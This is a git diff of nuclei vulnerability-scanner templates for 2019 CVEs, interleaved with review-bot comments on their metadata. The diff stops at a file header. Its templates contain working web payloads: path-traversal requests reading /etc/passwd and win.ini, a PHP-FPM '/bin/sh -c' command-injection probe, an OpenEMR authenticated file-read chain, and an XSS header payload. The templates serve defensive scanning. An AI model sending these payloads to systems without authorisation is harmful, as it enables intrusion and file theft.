diff --git a/nuclei-templates/CVE-2019/CVE-2019-11013.yaml b/nuclei-templates/CVE-2019/CVE-2019-11013.yaml deleted file mode 100644 index 572e46e66a..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-11013.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2019-11013 -info: - name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal - author: 0x_Akoko - severity: medium - description: Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability. Successful exploitation could allow an attacker to traverse the file system to access files or directories that are outside of the restricted directory on the remote server. - reference: - - https://www.exploit-db.com/exploits/47301 - - https://nvd.nist.gov/vuln/detail/CVE-2019-11013 - - https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/ - - http://packetstormsecurity.com/files/154196/Nimble-Streamer-3.x-Directory-Traversal.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.5 - cve-id: CVE-2019-11013 - cwe-id: CWE-22 - tags: cve,cve2019,lfi,nimble -requests: - - method: GET - path: - - "{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-11043.yaml b/nuclei-templates/CVE-2019/CVE-2019-11043.yaml new file mode 100644 index 0000000000..44c98d37a7 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-11043.yaml @@ -0,0 +1,18 @@ +id: cve-2019-11043 + +info: + name: PHP-FPM & nginx RCE + author: geeknik + severity: high + description: https://github.com/neex/phuip-fpizdam + +requests: + - method: GET + path: + - "{{BaseURL}}/?a=/bin/sh+-c+'which+which'&" + + matchers: + - type: word + words: + - "/bin/which" + part: body 
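Review bot: The new CVE-2019-11043 template sets `id: cve-2019-11043` in lowercase although the file is `CVE-2019-11043.yaml` and this very commit renames siblings such as `cve-2019-12314.yaml` to the upper-case form; use `id: CVE-2019-11043`. Its `description` is only a URL; move `https://github.com/neex/phuip-fpizdam` under `reference:` together with the NVD link and describe the PHP-FPM issue in a sentence as the other templates do. The template also has no `tags`, `classification` or `cve-id`, so `-tags cve2019` runs will skip it; at minimum add `tags: cve,cve2019,php,fpm,rce` (constructed example) and a `classification` block with `cve-id: CVE-2019-11043`.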
diff --git a/nuclei-templates/CVE-2019/CVE-2019-12276.yaml b/nuclei-templates/CVE-2019/CVE-2019-12276.yaml index c59ef768ea..a0cc848279 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-12276.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-12276.yaml 
@@ -1,34 +1,34 @@ -id: CVE-2019-12276 - -info: - name: GrandNode 4.40 - Path Traversal - author: daffainfo - severity: high - description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40. - reference: - - https://security401.com/grandnode-path-traversal/ - - https://www.cvedetails.com/cve/CVE-2019-12276 - tags: cve,cve2019,lfi - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2019-12276 - cwe-id: CWE-22 - -requests: - - method: GET - path: - - "{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd" - headers: - Connection: close - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 +id: CVE-2019-12276 + +info: + name: GrandNode 4.40 - Path Traversal + author: daffainfo + severity: high + description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40. + reference: + - https://security401.com/grandnode-path-traversal/ + - https://www.cvedetails.com/cve/CVE-2019-12276 + tags: cve,cve2019,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-12276 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd" + headers: + Connection: close + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 
diff --git a/nuclei-templates/CVE-2019/cve-2019-12314.yaml b/nuclei-templates/CVE-2019/CVE-2019-12314.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-12314.yaml rename to nuclei-templates/CVE-2019/CVE-2019-12314.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-12581.yaml b/nuclei-templates/CVE-2019/CVE-2019-12581.yaml deleted file mode 100644 index ed07cdfb22..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-12581.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2019-12581 - -info: - name: Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting - author: n-thumann - severity: medium - description: Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting. - reference: - - https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml - - https://sec-consult.com/vulnerability-lab/advisory/reflected-cross-site-scripting-in-zxel-zywall/ - - https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/ - - https://nvd.nist.gov/vuln/detail/CVE-2019-12581 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-12581 - cwe-id: CWE-79 - metadata: - shodan-query: http.title:"ZyWall" - tags: cve,cve2019,zyxel,zywall,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/free_time_failed.cgi?err_msg=" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - "Please contact with administrator." - condition: and - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/10 diff --git a/nuclei-templates/CVE-2019/CVE-2019-12616.yaml b/nuclei-templates/CVE-2019/CVE-2019-12616.yaml deleted file mode 100644 index 4c6728395f..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-12616.yaml +++ /dev/null 
@@ -1,45 +0,0 @@ -id: CVE-2019-12616 -info: - name: phpMyAdmin < 4.9.0 - CSRF - author: Mohammedsaneem,philippedelteil,daffainfo - severity: medium - description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim. - reference: - - https://www.phpmyadmin.net/security/PMASA-2019-4/ - - https://www.exploit-db.com/exploits/46982 - - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N - cvss-score: 6.5 - cve-id: CVE-2019-12616 - cwe-id: CWE-352 - tags: cve,cve2019,phpmyadmin,csrf -requests: - - method: GET - path: - - "{{BaseURL}}/phpmyadmin/" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - 401 # password protected - - type: word - words: - - "phpmyadmin.net" - - "phpMyAdmin" - condition: or - - type: dsl - dsl: - - compare_versions(version, '< 4.9.0') - extractors: - - type: regex - name: version - internal: true - group: 1 - regex: - - '\?v=([0-9.]+)' - - type: regex - group: 1 - regex: - - '\?v=([0-9.]+)' diff --git a/nuclei-templates/CVE-2019/CVE-2019-12962.yaml b/nuclei-templates/CVE-2019/CVE-2019-12962.yaml deleted file mode 100644 index 13749b9d0e..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-12962.yaml +++ /dev/null 
@@ -1,49 +0,0 @@ -id: CVE-2019-12962 - -info: - name: LiveZilla Server 8.0.1.0 - Cross-Site Scripting - author: Clment Cruchet - severity: medium - description: | - LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting. - reference: - - https://www.exploit-db.com/exploits/49669 - - https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/ - - http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html - - https://nvd.nist.gov/vuln/detail/CVE-2019-12962 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-12962 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:LiveZilla - verified: true - tags: xss,edb,packetstorm,cve,cve2019,livezilla - - -requests: - - method: GET - path: - - '{{BaseURL}}/mobile/index.php' - - headers: - Accept-Language: ';alert(document.domain)//' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "var detectedLanguage = ';alert(document.domain)//';" - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/08 diff --git a/nuclei-templates/CVE-2019/CVE-2019-12985.yaml b/nuclei-templates/CVE-2019/CVE-2019-12985.yaml index b96a4144a4..4a1d4341b4 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-12985.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-12985.yaml 
@@ -6,6 +6,10 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to remote command injection via the ping function in DiagnosticsController, which does not sufficiently validate or sanitize HTTP request parameter values used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ipAddress, pingCount, or packetSize, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data exfiltration, and potential compromise of the entire Citrix SD-WAN Center infrastructure. + remediation: | + Apply the necessary patches or updates provided by Citrix to mitigate this vulnerability. reference: - https://www.tenable.com/security/research/tra-2019-31 - https://support.citrix.com/article/CTX251987 @@ -15,14 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12985 cwe-id: CWE-78 - epss-score: 0.97433 + epss-score: 0.97276 + epss-percentile: 0.99843 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.title:"Citrix SD-WAN" vendor: citrix product: netscaler_sd-wan - tags: cve,cve2019,citrix,rce,unauth,tenable + shodan-query: http.title:"Citrix SD-WAN" + tags: cve,cve2019,citrix,rce,unauth,oast,tenable http: - raw: @@ -46,3 +51,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" +# digest: 490a00463044022007073a870a4add30131c5c00b135d70d1a866ff94c73254c7be36d7f69035400022019d693623a03aab5928cdd7c484b47e720fd292ec84beaa923722af625bd5648:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-12986.yaml b/nuclei-templates/CVE-2019/CVE-2019-12986.yaml index 1363a9bf7b..2599109455 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-12986.yaml 
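Review bot: The `impact` and `remediation` text added in the first hunk is generic boilerplate that restates `severity: critical` and the `description`, and `remediation` names no fixed release even though the Citrix advisory CTX251987 already under `reference` identifies one; quote the fixed release from that advisory (at minimum `remediation: | Upgrade to the Citrix SD-WAN Center release listed in CTX251987 or later.`) and state the concrete impact the description establishes, remote command injection on the SD-WAN Center host. The identical boilerplate is added to CVE-2019-12986, CVE-2019-12987 and CVE-2019-12988 in the following hunks and should be corrected there as well. The second hunk's `epss-score`/`epss-percentile` refresh and the `oast` tag are fine.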
+++ b/nuclei-templates/CVE-2019/CVE-2019-12986.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to remote command injection via the trace_route function in DiagnosticsController, which does not sufficiently validate or sanitize HTTP request parameter values used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ipAddress, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data exfiltration, and potential compromise of the entire SD-WAN infrastructure. + remediation: | + Apply the necessary patches or updates provided by Citrix to mitigate the vulnerability. reference: - https://www.tenable.com/security/research/tra-2019-31 - https://support.citrix.com/article/CTX251987 @@ -15,14 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12986 cwe-id: CWE-78 - epss-score: 0.97433 + epss-score: 0.97297 + epss-percentile: 0.9985 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.title:"Citrix SD-WAN" vendor: citrix product: netscaler_sd-wan - tags: unauth,tenable,cve,cve2019,citrix,rce + shodan-query: http.title:"Citrix SD-WAN" + tags: cve2019,cve,unauth,oast,tenable,citrix,rce http: - raw: @@ -46,3 +51,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" +# digest: 490a0046304402202b0ef3bbb83d1e3a581627f23a46bc39a52ce5065a1b54900ecf212a4377804c0220543b800342938579c7f4f18a4bedd5ea77398f66a0171d9a40d3a1c25678e9ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-12987.yaml b/nuclei-templates/CVE-2019/CVE-2019-12987.yaml index 7c84d0aaec..b25abcb298 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-12987.yaml 
+++ b/nuclei-templates/CVE-2019/CVE-2019-12987.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to remote command injection via the apply action in StorageMgmtController. The callStoragePerl function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying an array value with crafted values for action, host, path, or type, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data exfiltration, and potential compromise of the entire SD-WAN infrastructure. + remediation: | + Apply the latest security patches provided by Citrix to mitigate the vulnerability. reference: - https://www.tenable.com/security/research/tra-2019-31 - https://support.citrix.com/article/CTX251987 @@ -15,14 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12987 cwe-id: CWE-78 - epss-score: 0.97433 + epss-score: 0.97297 + epss-percentile: 0.9985 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.title:"Citrix SD-WAN" vendor: citrix product: netscaler_sd-wan - tags: citrix,rce,unauth,tenable,cve,cve2019 + shodan-query: http.title:"Citrix SD-WAN" + tags: cve,cve2019,citrix,rce,unauth,oast,tenable http: - raw: @@ -46,3 +51,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" +# digest: 490a0046304402205aba00dc71a461ecf5a2b4d96f029ca13228c3b3bd06050a3c62de6a25f718b50220708eabd18c088a9d7051f3c65bda1a976658e97572d79df298e9a97b73fc899f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-12988.yaml b/nuclei-templates/CVE-2019/CVE-2019-12988.yaml index 96229d44a3..49902a9eb7 100644 
--- a/nuclei-templates/CVE-2019/CVE-2019-12988.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-12988.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to remote command injection via the addModifyZTDProxy function in NmsController. The function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ztd_password, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data exfiltration, and potential compromise of the entire SD-WAN infrastructure. + remediation: | + Apply the latest security patches provided by Citrix to mitigate the vulnerability. reference: - https://www.tenable.com/security/research/tra-2019-31 - https://support.citrix.com/article/CTX251987 @@ -15,14 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12988 cwe-id: CWE-78 - epss-score: 0.97433 + epss-score: 0.97276 + epss-percentile: 0.99843 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.title:"Citrix SD-WAN" vendor: citrix product: netscaler_sd-wan - tags: rce,unauth,tenable,cve,cve2019,citrix + shodan-query: http.title:"Citrix SD-WAN" + tags: cve,cve2019,rce,unauth,oast,tenable,citrix http: - raw: @@ -46,3 +51,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" +# digest: 4a0a00473045022010a0d4f590ec7df72f845b76afa10bba295cb790b5809a2e8f9ee10f2ce4e675022100ea18957ac1dfad6868cf21d0c21ef9ea8f03951dfc7dc71c1755160935f07d7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-12990.yaml b/nuclei-templates/CVE-2019/CVE-2019-12990.yaml index e8757eb3fa..e582f7f42c 100644 
--- a/nuclei-templates/CVE-2019/CVE-2019-12990.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-12990.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to local file inclusion via the applianceSettingsFileTransfer function in ApplianceSettingsController. The function does not sufficiently validate or sanitize HTTP request parameter values used to construct a file system path. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for filename, filedata, and workspace_id, therefore being able to write files to locations writable by the www-data user and/or to write a crafted PHP file to /home/talariuser/www/app/webroot/files/ to execute arbitrary PHP code. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or denial of service. remediation: | Apply the latest security patches or updates provided by Citrix to mitigate the vulnerability. reference: @@ -18,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12990 cwe-id: CWE-22 - epss-score: 0.94814 - epss-percentile: 0.99071 + epss-score: 0.92152 + epss-percentile: 0.98756 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 3 @@ -51,5 +53,4 @@ http: - status_code_3 == 200 - contains(body_1, "Citrix SD-WAN") condition: and - -# digest: 4a0a00473045022064e7769e949952387d8d15bc023cbdc50a52b1631164c1e00054b400f2c58d850221008e09ade789e613b29d7df893f7a4eb89b19683128c839e94ca6e33a05e4eacb7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022028d757c9021cfe91970444757763cf2003785713ea9f3602bd768bd83be0f8c3022100c9296bbe6b5d59548f4e8fba22c9ef4b44984f446ca9b44fec7de62e4bc23bea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-13101.yaml b/nuclei-templates/CVE-2019/CVE-2019-13101.yaml index 978be5cfa8..747ee42f66 100644 
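Review bot: The added `impact` line names "denial of service", which neither the `description` in the same hunk nor the `cwe-id: CWE-22` in the second hunk supports; the description establishes path traversal leading to file write as the www-data user and execution of a crafted PHP file. Replace it with text that matches the description, e.g. `impact: | Arbitrary file write as the www-data user, allowing a crafted PHP file to be placed under the web root and executed.` The existing `remediation` context line is likewise generic and could cite the fixed release named in the Citrix advisory listed under `reference`.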
--- a/nuclei-templates/CVE-2019/CVE-2019-13101.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-13101.yaml 
@@ -1,35 +1,35 @@ -id: CVE-2019-13101 - -info: - author: Suman_Kar - name: D-Link DIR-600M - Authentication Bypass - description: An issue was discovered on D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices. wan.htm can be accessed directly without authentication, which can lead to disclosure of information about the WAN, and can also be leveraged by an attacker to modify the data fields of the page. - severity: critical - tags: cve,cve2019,dlink,router,iot - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-13101 - - https://github.com/d0x0/D-Link-DIR-600M - - https://www.exploit-db.com/exploits/47250 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2019-13101 - cwe-id: CWE-306 - -requests: - - raw: - - | - GET /wan.htm HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "/PPPoE/" +id: CVE-2019-13101 + +info: + author: Suman_Kar + name: D-Link DIR-600M - Authentication Bypass + description: An issue was discovered on D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices. wan.htm can be accessed directly without authentication, which can lead to disclosure of information about the WAN, and can also be leveraged by an attacker to modify the data fields of the page. + severity: critical + tags: cve,cve2019,dlink,router,iot + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-13101 + - https://github.com/d0x0/D-Link-DIR-600M + - https://www.exploit-db.com/exploits/47250 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-13101 + cwe-id: CWE-306 + +requests: + - raw: + - | + GET /wan.htm HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "/PPPoE/" part: body \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2019/CVE-2019-13396.yaml b/nuclei-templates/CVE-2019/CVE-2019-13396.yaml new file mode 100644 index 0000000000..d1cafa9db7 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-13396.yaml 
@@ -0,0 +1,63 @@ +id: CVE-2019-13396 + +info: + name: FlightPath - Local File Inclusion + author: 0x_Akoko,daffainfo + severity: medium + description: FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion. + impact: | + This vulnerability can lead to unauthorized access, data leakage, and remote code execution. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. + reference: + - https://www.exploit-db.com/exploits/47121 + - http://getflightpath.com/node/2650 + - https://nvd.nist.gov/vuln/detail/CVE-2019-13396 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/d4n-sec/d4n-sec.github.io + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2019-13396 + cwe-id: CWE-22 + epss-score: 0.02602 + epss-percentile: 0.90051 + cpe: cpe:2.3:a:getflightpath:flightpath:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: getflightpath + product: flightpath + tags: cve,cve2019,flightpath,lfi,edb,getflightpath + +http: + - raw: + - | + GET /login HTTP/1.1 + Host: {{Hostname}} + - | + POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + + extractors: + - type: regex + name: token + group: 1 + regex: + - "idden' name='form_token' value='([a-z0-9]+)'>" + internal: true + part: body +# digest: 4a0a00473045022100f914e78ac71588395cde4bdd71fd9b68becbacd99efa10a46cd8fb336167e4990220063fa341232cdda62f8cf22c6e18aa7a5abd50cc86691eb6dec1c43bedf7749a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
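Review bot: The two raw requests use different application roots: the first fetches `GET /login` while the second posts to `/flightpath/index.php?q=system-handle-form-submit`, so the `form_token` extractor (which reads `part: body` of the first response) will only populate `{{token}}` when FlightPath answers at both `/login` and under `/flightpath/`, which seems unlikely for one deployment; both requests should share a prefix, presumably `GET /flightpath/login` given the second path. The `impact` text claims "remote code execution", but the `cvss-metrics` vector carries `C:L/I:N/A:N` and `cwe-id` is CWE-22, so state only what is established: `impact: | Disclosure of local files such as /etc/passwd.` The `remediation` line should name the fixed versions the `description` already gives (4.8.2 and 5.0-rc2) rather than "the latest version".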
diff --git a/nuclei-templates/CVE-2019/cve-2019-14205.yaml b/nuclei-templates/CVE-2019/CVE-2019-14205.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-14205.yaml rename to nuclei-templates/CVE-2019/CVE-2019-14205.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-14223.yaml b/nuclei-templates/CVE-2019/CVE-2019-14223.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-14223.yaml rename to nuclei-templates/CVE-2019/CVE-2019-14223.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-14251.yaml b/nuclei-templates/CVE-2019/CVE-2019-14251.yaml new file mode 100644 index 0000000000..9b1fec3938 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-14251.yaml @@ -0,0 +1,31 @@ +id: CVE-2019-14251 +info: + name: T24 in TEMENOS Channels R15.01 - Pre Authenticated Path Traversal + author: 0x_Akoko + severity: high + description: An unauthenticated path traversal vulnerability was discovered permitting an attacker to exfiltrate data directly from the T24 web server. + reference: + - https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt + - https://www.cvedetails.com/cve/CVE-2019-14251 + - https://vuldb.com/?id.146815 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-14251 + cwe-id: CWE-22 + tags: cve,cve2019,temenos,lfi,unauth +requests: + - method: GET + path: + - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd" + - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - "for 16-bit app support" + condition: or + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2019/cve-2019-14322.yaml b/nuclei-templates/CVE-2019/CVE-2019-14322.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-14322.yaml rename to nuclei-templates/CVE-2019/CVE-2019-14322.yaml 
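Review bot: The new CVE-2019-14251 template uses the legacy `requests:` protocol key while this same commit migrates CVE-2019-14530 from `requests:` to `http:` and the other new templates here (CVE-2019-10758, CVE-2019-13396) already use `http:`; change it to `http:` and add `metadata: max-request: 2` so the two paths are accounted for like its siblings. Because either path alone confirms the issue, `stop-at-first-match: true` under the request would skip the Windows probe once the `root:.*:0:0:` regex has matched. The CVE-2019-11043 template added earlier in this patch has the same `requests:` key.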
diff --git a/nuclei-templates/CVE-2019/CVE-2019-14530.yaml b/nuclei-templates/CVE-2019/CVE-2019-14530.yaml index 9036514de2..0c41cb85cf 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-14530.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-14530.yaml @@ -6,21 +6,32 @@ info: severity: high description: | OpenEMR before 5.0.2 is vulnerable to local file inclusion via the fileName parameter in custom/ajax_download.php. An attacker can download any file (that is readable by the web server user) from server storage. If the requested file is writable for the web server user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, the file will be deleted from server. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data. + remediation: | + Upgrade OpenEMR to version 5.0.2 or later to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/50037 - https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip - https://github.com/openemr/openemr/pull/2592 - https://nvd.nist.gov/vuln/detail/CVE-2019-14530 + - https://github.com/sec-it/exploit-CVE-2019-14530 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2019-14530 cwe-id: CWE-22 + epss-score: 0.81752 + epss-percentile: 0.98283 + cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: - verified: "true" - tags: lfi,authenticated,edb,cve,cve2019,openemr + verified: true + max-request: 2 + vendor: open-emr + product: openemr + tags: cve2019,cve,lfi,authenticated,edb,openemr,open-emr -requests: +http: - raw: - | POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1 
@@ -28,27 +39,25 @@ requests: Content-Type: application/x-www-form-urlencoded new_login_session_management=1&authProvider=Default&authUser={{username}}&clearPass={{password}}&languageChoice=1 - - | GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} host-redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: word part: header words: - filename=passwd + - type: regex + regex: + - "root:[x*]:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2023/01/15 +# digest: 4a0a004730450220581dc7f9af0e6819134169343d3902a8c4ca36a9c1794b2bdc3da5fabbe6729002210093bc4a3b29b79ac4bcf1e1922164adf7f0e82eca386e7de5af62c4a228587ce5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-14750.yaml b/nuclei-templates/CVE-2019/CVE-2019-14750.yaml index 7a62889c9e..38dda391f5 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-14750.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-14750.yaml 
